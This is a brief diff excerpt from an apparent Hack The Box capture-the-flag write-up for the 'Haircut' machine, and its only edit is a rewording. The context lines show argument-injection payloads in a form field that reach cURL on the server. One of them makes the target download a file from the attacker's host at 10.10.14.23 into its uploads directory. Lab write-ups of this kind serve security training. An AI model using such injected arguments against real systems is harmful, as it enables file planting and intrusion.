Kyuu-Ji/htb-write-up/haircut/write-up-haircut.md

 formurl=--version&submit=Go
 ```

-This works and gives us the version number of cURL, so lets try to upload something on the _/uploads_ directory with it.
+This works and displays the version number of cURL, so lets try to upload something on the _/uploads_ directory with it.
 ```markdown
 formurl=-o uploads/test.html http://10.10.14.23:8000/test.html&submit=Go
 ```